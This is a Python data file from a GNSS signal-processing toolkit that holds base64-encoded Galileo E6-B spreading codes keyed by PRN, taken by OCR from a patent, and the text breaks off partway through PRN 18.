| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d3bf2c2f3f27590dfcb369b48d62ab8029da71a0
| 43,433
|
py
|
Python
|
gnsstools/galileo/e6b_strings.py
|
GNSSX/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | 2
|
2020-02-28T18:13:51.000Z
|
2020-07-04T20:19:39.000Z
|
gnsstools/galileo/e6b_strings.py
|
GNSSNWO/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | null | null | null |
gnsstools/galileo/e6b_strings.py
|
GNSSNWO/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | null | null | null |
# Code strings for the E6-B code
# OCR from European patent EP1825626B1.pdf (may have a few errors)
# The codes for the following PRNs have been compared with recorded signals and should be error-free:
# 1 2 3 4 5 7 8 9 11 12 13 14 15 18 19 21 24 25 26 27 30 31 33 36
e6b_strings = {
1: "5mSKpe/wkHoXA3f7IM7e4ejSU9rCSWgxAQM2tEQna6qxflmVSLGnnGc3n5jfDLga6NkU7klHCTrcuU/0s5Fu5WKkyv1KWgSXIWBuVf/+smyUnXyLCretL33bv4ipsJFRDSCaqj9sg+z7jeIbd+eTqedZ5zp+1jMDlf2TgOjobwpRHg/sjgtlAZg/p8aT////cZ7+QknvKVtXjlFIF9nobrwQkXs7dla+9smquCALIN7lS/2xhyijOTRQ8gsIp6yEqflFOY4TQ0vTB2CH8yyhZa+5T+qWhpJOgxukvXas9i17IWusU/cfrxoTWAvfu1bdVVhVqeJUH/3tKt+mEl1z8RYAanFVlgAdFTiw2RyNRF0DQrkQIZ6mS3enokXk5wrVR1kMPVnfMs+KzsttLxer2n+J2wnJai6BFZmjkZHO6PjUKgvCpdANjXwxjomWRwKA9VHSXfrxU3ZvbSNyNrI/vh50SEypSFhIzVwZZnBeoDoCIOhLGvyfCPi9wRDZWXlzwPNH9SWVke7vAMOZ2abvFAt1lGXgf0h6zpuM406yGaxjwBEnUgyOLS+nCQrHVJdrja5cUfGAAe0JVRjcZZtXRrOQImATpt7xxU30vh5gy6r9ENFj6Te8dTGEeRlmuTCZD53wqY0vkGAjOFjNaZYTCIh2JysjxvwnKIvn0ljOPoOg8tXDqbz8DnyfAqoKl6/DGihunPhb5Yhf+iLlGCfvsQZkUrJzNcAfyuZFtWgZudfHAUtLjAUOZHsbIVpF+Lk5YkQz8DGchA3qJl2GMaHummZDnamVY9sWjpwVdOJzD2qvcJqhRbdduIWxT7eOOKBZSKvGIGx5PDPOkYm/8ZM4wA",
2: "oqsdtXbyBh1pk6w4Mv8EHDiORCQKpuq2GrtFDZYe1sgIjAUxPooxsyLMdXw4n/iwM3kr/ayl09SSYyFJfdu9fED4M6qH7A0nsR4hXkkVKMCRmy4NMQbbujhO8isRM1OMeMdsSrrIST4Yow6ELNAFAe6ac3+K1+fXjvIuqCbolzvRmUWlowpBASldTZAQz7Iy4hh6mKuYdt4cmzOyOoMoAo6REaOtYS11g7DmpQKqOq1+kGgAE6PC6DxHXGhzB7m0txtmjueyVzdW8aufx99NuwV3yH/qcDGho7VdBUcxwf14SSltA/Zr7NBNwlyZv+vYEGIpcMFgJINWoVoYw/aQfjnEvoLqyK04dNPsZ+d/uvarJd4/52S9IrPsJMlE5LwGBnU2nedkKXLcoZpof2aAz1mO7xspunpMFdQ6b+M6qGe5KfFY583swI4RtuNSUq0Uit59qu2LF2SP8emAlOVguJt19yCEvNpLk9I3VV8/oiciU39Keuqb7CKNe6ndcYmxFlw12bz3eR5II/2BoFEx2d3w9pZFjJP/JV3tqyxLVbZPX/YhuKR3PBqVwLR9hOL0EKedj5Wcdq6iR4RqFmaEVlO6R8/udixoRu37XfrhRPoxUB/BjYy3cWC4s/pVAMMNX7HIsLj1BgGC8ni9dI47ZNjaf6haSOAXnKOiRBsiBfvF4zW8SdCx/mCy1/lEhMKSF4CzG5lodH7k0Z8a69MU+AGPR2Sbjv5tj3IwToEPoiMBtiBnQgJlHXOjw6+EzCWfJqt3X0b9lH6lgYsFUiRmepTCnQvkTpJQU8sKNfxnCh/r856wDX1krSOvA2kV2zb6tlStnV85s/l/FtsLlSJxgA",
3: "18UMqrF0cac1xR1HWWRL5KeI/qjs1fF+ALNz29JJF0gdp0GCCATqXLNmiFrf/JiO4hoIde56NpgXJrcQbuPH5MFDWJDkFaL3RmdjPh3H0ln/LDodQI/sTReSMm52kSU/bcPnubQ+tUauKOYVKYT/Z35FhbFje4o4xwQhOAUIiPiOoEeel0gz6l2htEU1DUMi22JfVn9tzD8aj0CWvlMzvwucf1VFxddDCpk1ogAf0XQqo05XL4hokqwGG0odMGuRko8qjBWeI30jpL+dCPZ4D5k2+mpjaEUAzcUe1q0rI1dMRZuDugUEzrIZgPMk+Ro3pI6EAhVcuXeY8mGNwpL/q9nbgABQDDDUuF9NYkm0Az0JjAgxblcLEOXJOd4Iwd3pGLdJMyteaqSIpa+Tf2CUFOiFx3qVPYypP9OCyoR1L1S9J3n0YPDt7kjJmuqDeHfvAa+paH8zQhj47bI+uj/ArIz4u1eUVi5tWwo1bNtrz8DKwqzObO6vECypgLI6NvicNUcNC7Qci+sr4ObNDJaJ3y0ZB6/mibScGdRTmqGkhBK28VIng5Yp0ql2JJ/wVyYZQMbohxnuhnLop3LnzRDfZpselmqNk8Sz6bnU0BSLtT8nIgjxkrNwsXKR0zVz2Lp2mEspgDQ5KN5PetXjNfvM/bvTHI6fpjAVMn0FF+ovFh71oIvMCFa21b0hD6PfrpGO3XxORElW//JFWkw8ceq3FaEvud8UXH+09GoXyHd5fuFYc3pzD4k3vG34MlgVRk7tT0it5xjAHMe/5ZedcdH8h5lFJPicp4l4i6BX+dSZ7cfh3Gv/QZIPwbXD3iY9V2izEje751BhflgCCUU33I5iwA",
4: "qmlpc8Ol6Bgwn3MmTZ7iGfxpaS8Qb3/LitzD/OmBbGkcB7mWwOXe32NQG2Om+eXyGfz4rLgR6YA0a6QyzMbioPqVueMO0DRorH0cClkDU1lmbxoEx2c/f7fFV29rLGVIl59IB1TUx8MaSk4SVRTb+2G9GZgwhVqSi6WFMSV+AfXWnSIixWwEcsM1TeoZ1WPv+eJRUCVvLX52oPcZtjrWkXuhPGnUmyKP3n1BgbhDriP02HQNlC8nu3AxmdcKDrXTwN8E8Lq6muIUCMYHA0X6gqaXkruI8RlMbCBQCKcpPAdxabu1goHPV98YRsl2r75bqvvwXElIrsR0zoWw3aRQRB2sHneLxj0bddhnUy+jU0zuwLeW6tp2uO/MH7tw9JAghufHkm/xntt1+phIUlBo1ZHR8Og5lbwQwKJd2OIiRatyVY0n9iDnheUTIGLzr2Quucg5RHFMv1qY6hhAJQA4D6puqngj4Arda3Dd0ch55IbGw5/Npd1zR5iqcKvAeteGfwPsPB1HgifcyRcBrqflCQhasxmFh5DWkqybGoVTfnoW1GgtaeDvX65js0LYbGthDbQQIv5GqAE6dWoxMcBzGiE8O7B5gavVPCIQPFCUY2zWMLquyUAOV03+1F+sXhr4MgbmLRSGqArc6sionTuPm8jIjtXx7EoxyxZIdRCgVMrKdyXj/8SvTGWn3b5NCGH0WT+EzjbFJ1xUO1c7OtwWWSV95TOW9mfoo/Q3XaSrI+tiJUZUfB5R60NtsnvD8yGxXDc94nVfP4YKiizmLJDnKHF+Xo3wmuxn/aws2E/4zpGAtNop0y9S/4SfZLxlJ47q0lu1TxszonNe6axXZvLjAA",
5: "qkiwzHJve4W5rOTUI5ZKHlSNbLePiG3pQeSTYOU+qnrTA7z03fPo5kDbczcnCCrtEIw8SXZEgA4UrnjfldMhTZSL7cs9Uv6qaP758KmGYrOQyg6Y5mPr+LdFmoUm4G9jljCzeQtRlfkzD/oLypwUEgE2zxFWCVa1mKOmVqBF4lS/q09MmQf4LB0r3/NZWJgNSc0+nR3hzYbXKjU4U3HNpsO99CJWsT7my5WfHLv+bKdJODUSMUEIlQm52HQb5pL9aYDB9y8yjGcPqRiCrzadjXX2QKSusgkjc43g3i/4wpylBVdcWbd50y95DXr421xeE4EOsxaETRz60pegQdO5vlJINhgOUDmu55REyh7TUq1N1h9xAa4tVWzsqn598fe/Loi65X9gkGwnwSrwN4DkLB8PSiIimIMTMmiYco5c6OCSZzY1dfmy6pdklec5UsBeaflVxfZpN6S+FX1bpj9SmiiEb8JdgAyIWPi+SYhoH9tilNrXblAcQNikm4Fq6JkNTu4qAp3JuhcX63wBPtjW9X3tpHhJYPxQW5Gh/nIPEbldv3kA/fGC0EabZ2ThWdzBcDzUzpqionNNB+hrN2otQVwrEfy/+wwknasLSNJ2hdPMIHTg93rQggba1r5hJ6Rflw68H+1cp3IyPA1wNp5TkGUYj+37LploQlw9XzhWU4DZWAdbfqtvzHRkvEp3zCPrB+gSSKXtaK+ADFoZB024sK1kA7iHXNnJ6VygnbMD2oeatGi8IT8kjcJ/r5LjL2sH42b0OobvMPjzywnPlAaeaFRshgCWT8Dff0E9Lf61zqwSwXbkkCOtdCCYOM8Jkt0NJnn3/tO8I2cHoTQldqclgA",
6: "xSmgtCA2FP0dhFHRDcOa2uYXuwOpGL2J+4HUAoETcktMfoSrsZd+NfYyvD/zMWoNbPRl3NOQYvo/7efwzNB2TxseLydEUoLOxmCPFqD4/5lDGcnIkwH/aFKUlxOConNgYmSewoB5G3ckw10UqUAKQ3uVFhh1FDyGtR1ODDGbgi6NkcCb2WWqf4PAZXp95eNGonZC19Y4oAzg8Ld7uE1FxoEhykt/kweyZ4UawGrJ9NTK1U/opigKDCUpqyd6mBQzWX9mjESWGoE9YlXiuimusFG/lDLE51Jy98NqIEvSC+xREaKI6FWdaPMkKQD8In2Du9IBOW43EPsqPLPuxKeBCgdKkgkIoTdXezWZwrc3sj2X2AFfH/5jlsI2DUYGd2cFPHpxvMWCZMP9VL7XtXc/1yeu6ioZ+GQoTx4CVKg34RwbH70sp0fE38LmDdda8ESpcUVMEidZU3De7EofTaOd9KnWQWw+TMizNPROw/WuIwY7tQAlpaWzwSUql551TED9Lkprd5x7DVzywKN6VpoSbghczAB9arkdjto93tsep9S1t9v9p484VS5mO0nUFnsPapIgPtY8t61RFHPx9ul2A0xPMa88B+co5bmR+j9PrTeaZ57u4qc69yNiPSKs+OBydYnjbezY+P/tegSLkR+vYW5It/oYKfu/Z3ho2QHA2otdFDOzp/nMy0UIEsBNKAyMKhMRO2FJ9UkFY2zdGRRU+wVhPYvIo2U24zfogH4Lqy7btk35hkd8tPk8keu5wthbCuwiRXywf8HbmNUrtz6Jb/WbHVuhWspcuWluNBCmum4uHZSw3MAdh290Qup23K2fsmLvEVPN0rAV9Hg5FsVVwA",
7: "8EQSl2WAo9UQa6NYV1xVSacFTg37EUve0J7S+GZYAd6PfXThdNg5MYeFDtJp4QVckGDDRB37kco8rYSlwR/tEmcUyMubuTTQPySgNQ0yh6ZNGG+lyUVjTHHw16T/UCS73S156Ot13n8xmFWF0Fbu8eup5MEAQ1d2p9NGXG2uIbHYmg/fAmSlq5+cekQY9rWjF+2CjmPWqlZsURlCID5i66TfvLgY7WIs8DMC4bOoXAsPBfHLePmpDHfvhWW/cD3PXUXI2VZ2X5lMj7MkPOCJ5o5wXzEL+em4GwROMHxyM8wdTjI39q9bGmmavBH8TB23qZi5yxlFT1q57X0//l7lWmGErPodOkgbt0qy5w4ogJ+S+hXLmeoKx8u6E4W72j2FblwsOqN57AiOrUhteC/SjFQz7BHwHMmWovFb87WzZ1KhiPrze/3BcKVEEdXQs21SBk2I/0x5wfDiglzWvZxoEcCxNvnvpydZHpjn1nOtK4G49wMyNWifnreKTahdPCa1Lws9gicEihkbPCgFMRBytVbouMPdlh5yz7YjXcasotFkQawhUcN9mqsbE7225Oguj91H/ZnoughRMcTMXYAca5BggDJvZaXF/ND8IoYq9qrLeRUq7s4N3z1DLg0AJTkBTKjHx4L15AKxLDT0QOx0OfjOFoL6bCtInA+4ZQ5/sgr1k0FlUinEUKopsksnn5uLOLYvz8Fm4AEl1q7lPDzfTOQSBtgp4Auu+nm421HOzk4stmoeMKHDmiw5WYuGdak1u6pOkp3yfKo9QQuum3TawUNbPobJwn/VESqbnZ5/emWxTwiWLzQBPeyQakh/wjPbi9JN6GFqjqrqb0vRiq+zwA",
8: "53uMoIGwQjTMLhSOzdw4kS3l0iOZU1EsIlPTYk1SvlfdPzgT/M25ToPgdMxgI5k3BNhipCOPN3xe6I32D0HZ85UvyFz+3FAKdbcRboXDDZeLU5b/Caki+fBl7QULp+o/r1lZDqFnoQJwWVwI9fYNNPIy2q7/Lk2eC/UFaOYZopF1vuuXoXz6TXM6xwJp92IZ5IAWLudjBODQf88QM4KcE9KTImGavXMspJua3Zg3JeKxBMFdxJXgH5r3o5jbAEl6mr+OJpjUNgw3Nk11JAOwtiWve1mI17vBHtN7/vCH2b7XmVj7Jpm1OC0xiuiu25dHaqaeVvyuJnbw8xgvws2JWe6XKpnVS9MzbayQTIKOqMQhxlV7RQTWVc51QxEsQ1VMRytQJjtRnVn1UVdmz6SARE1sHcsVpoOG1NUYFUtjny1eAeCG7fGnOgAFrZGuYYt7Be0MN2D9/1Ilk/Fpzrz/oii7lgNQ479nIB+9IciiuCMo3ObHGRK/9WgJdzBwnFTycdMgGsVjRDNh1VoqPpiXJet8UQgjotT3L/7+yBwwAS/o7uR5zh9T4aEtFdK8Ua7CPVyG8K9ZGGaRAi+mdOW/QFqpan4AOYvfAuT55mhSxE5efVg6fURcvcVKZHDAg8RDQKZfb3QHpMe7eE600Jpo/UHidWgpSy0T3lwqt9THgR/P9nqXhCtxIZ2fOtmJno4zSWDbVllqQcNkX6uEL8HPQeiZfO8Sd9lhYgyKiD23YfGhJq3Kk6QXIwpBnADk979/sxda6x72FL3fEa00Y3FfOaYbGwAdW51NX9NW8ulOdp0NI9y0axfl3NCRr6LOLC6BlibwGhTPVHOhOJq4QPnuQA",
9: "uyX9mccxIJ52LUMowFPs29ABGCAf96iDb452Ue919SzY/UhmLVP4zdmqdwxM/Qsvv6B+Wa4boXdoQCaiTk2Wu6O4VuVhA3UqEcN9rLRCYhPV7kf8gsDecLxJc/oCTfUd9WdlnmlHz1HTnNIc97iRGRcmU1Q/5U8cVyMtOtyzR2kbQl1WaZb1+NsJwx4wmSOsPVQi03YPHyK573QDp/pvMKYRzuh7fEbcg5r+ML75J6xvQEeKtAhMOl4IZL/DYl60lLL+q9Cgg3ozlNydIdA1Ev+U4mBmVUDGrq4sU1KV/Uukrd+fNMHvxIB+ZdWZSYRo9Tn9DAAIr3e5JiRMOqtYV7nw4lEIVvw3EhC+DQVNlqh7V0gOxDvkrUIf4OAKAarQZCKZAxK4bcry4m8jJ80z3LBX/UzflPg7V4UQxNfVZgqGTGyxECt8zTyfQ/WGJEO5A0tY8do0d0k2nJfb5v7o7wCTKCVNXWb7n0VSI1Srx6QsIijuU8Qcc2jH+3mAANefDFk/HPHmOJ8fP5czVNzHTs3J1CmdLM0+rhMgr+W7gCdkGxMkXXFJtt0e6OELgotvLHksWXy88phbzWMEjvkBVKUJ01K5rSAlnsdVFXLKlmX3s6lvGa9Ja8zfQv62NA3OCiekzv1HVecXUdycXWyVQo6it4g+mTeFGWLjxtgXyqjsVm+T7fOYy8EXuTcqAbJRkiU1ao2nLNa1FdjbXew+rsc2VlARToL72EaG6xHaP16WcUcchEmIN15BBcN+AMuiIKOx4noEm5dT0GTiHnlRP4kvtWIKxI46AHD++JvpMzxS5sFR/DzjbCEVUAfRtnzbzLTmDP08LFmoEzC3IMPVgA",
10: "lGtqC+yynyeFYxk9zdq63e9AfIeJQ3aU9hpBePhQAqfQpeZ7Pu6LkR89rlbvM12VP7sCxWvvMNIcAFlJaMXrWcCdd4xjfRKDFxs5AmiEuEEuKsFg0iJXZJC16QG3384ftG1hZpaAeelpWoue3b9xrOoAv3TNaw87sIVLm8AUuuXWtfUZYNR2j67nX76Wztsl8uPVAhE5NllVOFDP7EDUC/XC/7gRB5bZyLHnPd/QhtKJtAKNkmRi1YUBGU0JLgxqQQC0YyAVi3RiYV7pzmQw/J1BK8NlnATf8nb++QPsfH+EfPfyPO7jdgAY/MDidRf4DuWhVl98o89UsYvgIi7+JDjzBrbeLvbCdxNkCDM4zXbHTcDJj/qzSbHJ59o1dRZ2o5BEUTGuVkyafud++sB3KTFGPvkm2kgqu9I+AXI0PVlfcpmxdjOjRPZS4Ju6ojeOyEuEncvCHWTN7OkQd54dR2PKdT00esAtJwmDli8Xv47kvmKuP5LJgxz/I9RKg9pr3YWVXREB2T67SBWTRQ8jyN6HorEgFhbobgXINbSSbba2qQ7eYXgHHPq6PHzxm0GI8MZ5zk6xaybcseZlmYaRoHm1d3K9cunkSnDyjHnZq7QiUKpBFsdYYbf4q0EbnbavUt8klVFwh0JQRQ3xwxeC8AKtiHR6/9L/VCE54IGjANvWmyt3V5htbc6NNJiSsVKJIroF8lq0zdoOqMw2ALs3BDY7WiCqAq86P3A7IoTVVI8AGcoMfE5xgNCl57/uszkO5jaSvGa6invMxQLAbZUzAWJzVDmRsrN7GtuvFdrNaW9Cf0evYuP3J5GVHbA1pNC3vTyPF1O4XjtFwXdEDtFaAA",
11: "8ow+dUIGVrhnJZAM4LNcoyRqE9RVFkJun7y8dFGqUldOFBdwY9dKwuIMx8H0+4ldWtKRGN03SOEGqcfXy4WaMoh+gNhC+Szos8TihVITWISO7fxHiHKkIVDaZzKJSUCIVUiLyc39O1ConaAkPmwBUyGsN1Bjs2vGSMjPo9G8PgG/UPb9O6Ndcl5bBaMIxXcpast1cdrZdgJ79gL+TDRG3+0ugqCGvRMv+HLiafZ3Dw+n42rMVvfaLopQRDGcK4zgmZUQ8cRn6uS6gOhu/iidkplT5WG7wFLKW4rS9bjP4WaUZr/i/4I6Zq3LAYGf55d6wvDcfyJiQR46eQtTGP74OovPWSkGOSjBrt4oh3pjdMZooKLlTepa8XMCd64/9LrCQODKl6+TYjKNRa5L14hm06J1YXD+nfdR9IJ2hKQwMO1uWVh9JCRjyr9flASqZWXzBbbO4c9Mb5eWAoAVMOF2Djm+MQIYTJjmM+tO/IbkefbSvW4W7fVzp83MzfAFyZPFs11lF6XnA8VwN2VtHOC2aDWt2iRoT7ydozAC3x/3pGvoHKs+1O6cXJ7gxhzfRz1QCrPwDLKxvDfb7HVQ5dYEqKWL+HcGQ/6OFlJosPO3zAFdLKdrMjDRTUhUX0GbWqsMnQ4jD9RGGNWknFdJx77WaMczaAZ1i2Kdgj8WiU+vgxYIWojba/UZr/bhlBKnZ/8bMazDzhMn6XtHquSONo7pXh1u80GWiIPNLkiF3767fR6PtRzSDlpisyHwEQqxc48xzmeXEUNArmXMDt5UjQIgooH0sr23M97315L0AeM5PiutnCeazAUawezRgZ39tVYD5q1xRqTSM98o06TYXBbeQA",
12: "g+Jes1/qlIn5Rg8QdKRHJ3Ef31uxgNP/0+7FmjtpVtjyYryUcdSEef199hGaCz2u9kUWjErUpwutajHOCuzNiC7EHlLKsuvTw+Ekum2qcDFyqmvNtoXTZeQzfwdZSxmI9n0LK0jCRNaRQVy1D6Lk8ygFzRLcljWJkrqqNKqvEfd887xvjsB5zgACcjWpUYr5+haICU+Uo2hdxXi1xPKRuGuRUBLxbjXky6mUHmzuIUS+c2cDpVcEmY4raFC0tuQmxFkYhJWM7t5TxsXiGnc9gjrihRwYQeKpP9KkjlHtJvADZPywVwNIIZ9bUopUawCFDgEuEUs2Y7APXCEd8iuqHy7JJIh02lfHP2OeZm3IiT/zYvidd2oWY0JUY/okGVg4kNNDh/orWeq3/8g2Xn9sqnxhTCg+U83mDOhWcrZrq7leK3Ttntqo2/8u2ShZCoNRntPmb7BgHtAhHSnI4YjqY6nZFO14mBK906UffJfD4B7B5H1uxkIznn7y1BgPLks94SE/0D9/u+LKegKYGVqv6MHnDVVI8T7aLMh4jWsdEh9XetHPMVbofJ1y+5em3QvzdgqCiDx0u/AdhW0yluy5PGGM75MEEHQwoktw3/PGNZIw6aWdpB/WLaejvvpkQ/LauxElQCV7P9e/upr6CzFzRT/ERD0jGF/kqoyZ0Qmcc19liTp1NFviiQp905v5AL2QxjR4TQUczqyMI4PgZkDrHNdK+I64+7lJS46yANihl6jb80s9H0gj7QaEP/NwiDxYQ8+5g41M+UCeVciflRriqCcjiyufcsFBtlnCvRjTyu8ai3s+zCgzGglo50kojnT54ynX23tiReRgDurj8wClgA",
13: "277nTuX2mHG9av2rBQldItnHIuNt9WUe5NvrpI8pnYALqfzqBmgUSSxcvi7sZ+EEIvJQIzhj5RfOEKCTpEAV11V+rS+hhKbKkz70BftnVHISkBB4vGJ7XewzOf7+DItyTYjopF0pzKojg5bBI938qf8EshsKDazeUVt0sz2ArTmQtvVQaZgcQCYVHEl0c/EAS2DVSuLv3D+MlJvrDRgGAdqN43lQNK6NuGJ/HIikygzBn7LWt3ZJ+oWf8ZC2JutVcd2SAPWKFKVqtDqOla3eS1TqoR28AoAGex08/MN3t6shz0bBqUxa/rA+GxNJyu3ewGFgaDEUiKBpF5UyTboR7/KddHSJJBdB0iJTTeM08CBu3Xo1k/27G+uymwqCCjSXQpl6Ovs7XyZj63H0eon8MLt1mlZ5mC3z3foS8Fv7bHPxiIF82NXTs6Njq5EgjZo/dDzXHb/kYY7g2Un8Tsc+XjDE/OdcCTjK6JlEBI//tnxD9gDqp/XXOwwxxIuIoctySg9fa00liZE2jA8dnYsjetyHxy2g0rF7EhVZ0w44dWeagS+Cw4ale1NBkGLyyfpmQwbjbOtRIjjoZ8j5z56cIhOgiwjkokYZsNkrVIbb7o0uUM1k/stI1AJdKUtZBR5S9ZXiRXEg8hIDzpmfjtf3VzG/zT41bWKfxcmP2q+L99gMMSZXEE2ziJuvqFL4twl2jmGa4T/fv/GGyq6JXafj4gooC2w6a5cyH+wnqoO9tXKxd/EvrNcKDJIHkeJY2Bcw3XBcZXFeRvhC29L6vTXjhhZvDq1DgFTTI3SRq0CkC3yGSsTmnxO73SVONDYOQ53wlgpUJxupPXBmU2kfAjn7QA",
14: "zUFmGxiJTvHDzrDOezATUtE4XixQpWjsBIVu1NRDT5ZKRwE3JEBgLjFWpFQWw/dcIcAmIkL9Jsh4uTlSNQ/tMyOb6NEfTmyFdqV2HIo0w2+MD4yB/gZj25ALSaVyyckXLsvdAErE/EQlfGs72NpqYZOQxuJq8KCTLv75idNzf3fipAxP4iHhJbY0knKbd/3Ek9Wk+qK9VkFJr5DgdJe1cJb2W/suOjIESTPEK4e2T32LCjrw72aUuMNu/ZfJe2MXXfURD4WAnkePzCXYPY6zA8OHFR4DHk+kpMkmzp2JOjAZSDR7GRur1SgrSmTtbDidG8ItMkr4hSx5VgBWYXCKdwdf2oLuMgZ2PP/0L3SmXcw7wz5AjVYdZZZPXyWZRpVQocQgv0tG8U9TBxXutmnqgZ9fKIvhbWnwdRepUjUosfXbSCaxEpfx7AHZM/rq/hd/bs9eTFLf9PAnr12fkeWCKx6iMlStPCqnecbaQiuXb+CBRDX3NIvuq5Jvx1aQ7hPPvEIcMF9WXcXnO3O1gRHxqHNI5u+c8A0W+zWSt/UriKH78BFaYIme1X+NlIQ+s/yH966W6/pbOB9qs1XNDDAfK2pbhIMuoNTgRwB+0KhkjcNuFvIec+Sg5JksHCGUwyVka8pexGXV7I/5sfzGduNGAsJxsyxOk3QOE7hMTLOgFFHgWTEE692Th62qN3VdqQoVMxJj+QS6kHFQtSp97IFc5ajiLbdzLAbIPfzh0Rj2kEw3IR4OVvU0EI1TkwfUSleKghVn7kZS6g7c+qCew031hJd++zIlryjLH0LXLiAE69tX+Q3qnJiHzG7eYhT1+PaGzsgMRvud/XHuTadm6/bywA",
15: "z+6ns2bys2h8Nkr1a8cCiF7FsdD+vHggH+bJFMugBHIHMLzxpYinOo4x8YhT2mYZ25R7AOnkWAt5JckZj4h3iKmGkn+iuRFIkBa5WUgpUPYfpYhEYB63Ztq1RHrABnUyR6Tcs6VBdQqkpqCtv8f+H1LrbSFCxu8PZcbpnh7CMGTKNaPbFJjEJwfAWB7e1GG1X/SZl1+Im4eeRzMTOFSxBm2lNIc2eMT/iVOkPAL1fRppLjsVP8HA9/woyKDuE/2sI76ZFRG48V7XBsu3NVmfVQJ+ic9Y8Bhe4q6AXL51SNknlW9Pf12Ti/WhciCIghHy59dZAo4yzW3olcHkCLRydUHE2lEVYYi23gN28aO6kfX8Hiw0cMB045M4B1Wvo/XvjmgijL4HzEK3U2MH2K9BT1mfkB3112TccqfuuXbM8pqgQ8XisgPZEo7SVQuP0UQl4P9LoFu3ZSxGR7LfyaUMIOACsKUPWzxhEvm8m6MSDyeSwahEFdmdi3YjU4OLEXbtzKV8gukwf73maqzuXEolmdm9gmtbM2Ii6OnJ8kiTVqlrC+l/ZWjTg64baoxTJS7oEHC4YXK9Inbrq+e7cKzDLRPViYIctTp9bv4UN79s/sJlCxOfN1Fq4Rz2eCiTfAumwJNU7HAzXyVrXDtrHA5cnOTyxT1U+1M0L3gy2MccmgaseHkvnvNUMe4RUBEpefQ1H64vOgzDMWNXHd9X08iCFzTXebDFvNfnvLvN6qcmCFJxrPitC0iouoSVohyVjHMTTN1ErDqW8KGQvYvG4URPBpX93d80+uiRfAEBsf7xBxDbGXUfr3bk59zCp/xpFJ9dnyyBOm49WFhEYUlHXJcJwA",
16: "0TMbjxV0FglaDtKUx4pOyYfT+Flu1bmlWNvaL9smKYXJOAh3q+/squB49+pA2Gggkczl31RwViJ1syDUTNdUoIoez37ticN30X2/NdbWS4JGbJPDCZsPnA0Jaw7QZLyntr2MAmcoIT0pwKWMtI3UYGPJkMsZMcD90slMA+z/t2aHmcO0oksPBaw554fZQsLi/Khf1ZVZUTBmVDnh0v2ZTs4lU0moa49bMQTTPqQLI27ddfgCYqPASoHwUb26xsKJpDe9uZKH3Xh+mkKC51yCxi6eJJqM1AIX99A2qlrBUgKaEVk5Gv30cD6mPP0N+kekJaXK8hIeqF3VdJhnd4K+OB9IJgitO41HkMOFBRFnYAesAq0btP8Bx+h/xPioZaYYMUVNFW7UQvY67/pxvgdWmH7N2WM7cR4I5Savk+LSkYxCfFjRynUYaKzGncLOVn3ptjQEbc6EtWY4s6hn7MKg5eRNIJEA6r8IOr+W3mA8XOo5DCeGCUf6Ag5slA3nVucIqNpQ9Or+P5sH176NFAIQCTf2Fumya+evQIAgvngdetGtCWszA8YkQ8wwV/f6twSQ472LqFZ8dElCU2upMdJtJ+sfwaHb8SrFg/Aen3IfT3c5JRTmNVWmA3HLW1tknD8Sguz2YltM9WbBS15mtXy7X7Pb95hNvTTedvovVWTfQ7iNxcrcKXin4pKTri2fqN1TyJKbqRB01GpZ6y2IxZQdsJLRod3lgXxLjLe5j3gg7+WZQQpnF9JIri4QhOr4xn3z5R0UPNLMxpN3wqdFRAVq3wOqZAwt3b8CLEGWWNnLBbK+J/s1cLKms7h3mbsmIPZ50jCs850xnQW/DLffz073QA",
17: "pqyODEv6zh+oqtQI7h4yp6w9TK8PtV7RDIAWgwbmHMWiVxPSnE57FQ66LvuDQC1u99qtNecZbqQJ+6zcDkcqRat0zOZ9klWLLfbTpzruJWngma0OsnzJAglEj9UWxZ/F1PaXNQe8omu2j8mX3/ejCUpOi1q6QUwgvfMNIoRnraxq8Za35eGGS7P/gDOYFeiiOBjNXlrI1y9G3GP9jVXg3k+jSnsbp1wLL18/vRKHdMgQ4J1S6VdHypbsPHKqRKO8LPTD3cr4V3GZgANNIXxT3giErVGqbpp4NwOGQLVJd+IygVi44xCz+Z9aY8R4WiteHIbLF06BvFlK5Q9TxVgCslpTAWwtlkAP68hl3kell6fKAaPBNhDtuJ3ldgjFgkpe5ZSXke0a+7pLks8Xtw44xfXBgRDaM7zcbtj8I7BxkBPPkh60V6PqZjWY3yJWNKPBfcjEzw8hnBICvJc6IuQWtBuCiAuyC8K9ruHbzz/jrDGsm9WBfj8EZQecOpi/EaRm/jsgbSv6TKhP7giyHx1ExjVj4ngUOuRNfo/vE/K4zBhR5tWb/7OOPuLinYsT2s/zt6hsDOAGRxLToncOPk6/K8+IW7dOLa8Jpvmi7KYgEJ3zavSS6fHDAdP7WvR0/96VbTcX21eFJlPax9GnVrWQjclpFD1W0xVUCt8ICkiBahOV6TqeI5IMO9o8zSonWoSDtuJnf5CtIVoEwQl6GgOtniEJ307BuhiRNfxH4DTMh1MlRA0Q6cgshazOMTC5jlCwR5hbE5Ayg3kNQNsczOlpv2QVHOUwsxbeLa9r4nuFs7WsAi5r01SEmIKPWLE8dx3I927mALLf99ZZaL+wTmXZgA",
18: "kn5Xr1bmLy+K+Z4TEP625gmheE1qrAEXs8aT1CO9t+ENdxAlehNljMZUP/T4t6TOBdn93B3aVJO5s7dN51wYTsN9K+wnb/WZDrwP9xDHK+3gv7gF47fd+wr61uIQwAYqYqmrt7aflGJb+hCW9c0+UtvPvDJoCWpzjYUiXYw7Sa7cloGH0mb/m0Ut959NLPd2WTBsrz6xVwBQlqHpT3CPiCdsuABWaD96RMMZfFGbVZOAQRoWPToh2b3rUyWujg6bPyk1CdZn0lwD22R0spxKZ9Q7f2J9p1vuN66yx46w12iDSjoOVVL3JiHRjERt8xdMDm+MuUVt+Gb0VSY7HXeQym8GgY7BQY1nXhzUkPnoCm/YVUg/lFPfrPGt+3fqCE6OdJZ4hi6OnQlfiFrOCeuLmRgTfs9TyWp+Jb2M71+2+76Bo5pEXBcnA9ntqdrZLqvTqCLhbuDJ3s3tQHeDtLa24BMKnGeHEWPnNFAlMwPl45SQaobRG3AkC3mpqR7DgaTP7Dq4G97Y2c0AHUFLMVWnxJe/Vzon4fkqf8Ugaup+QAy4BjIOEDxgqaivWMzQwOsDpOokyn0QaHWyp5+jqKjR+vokjbT2nsKPpjK+gtQ5rbHgaAT6mF9UKphSzBUiWJ6/TpPK3Dtks+DW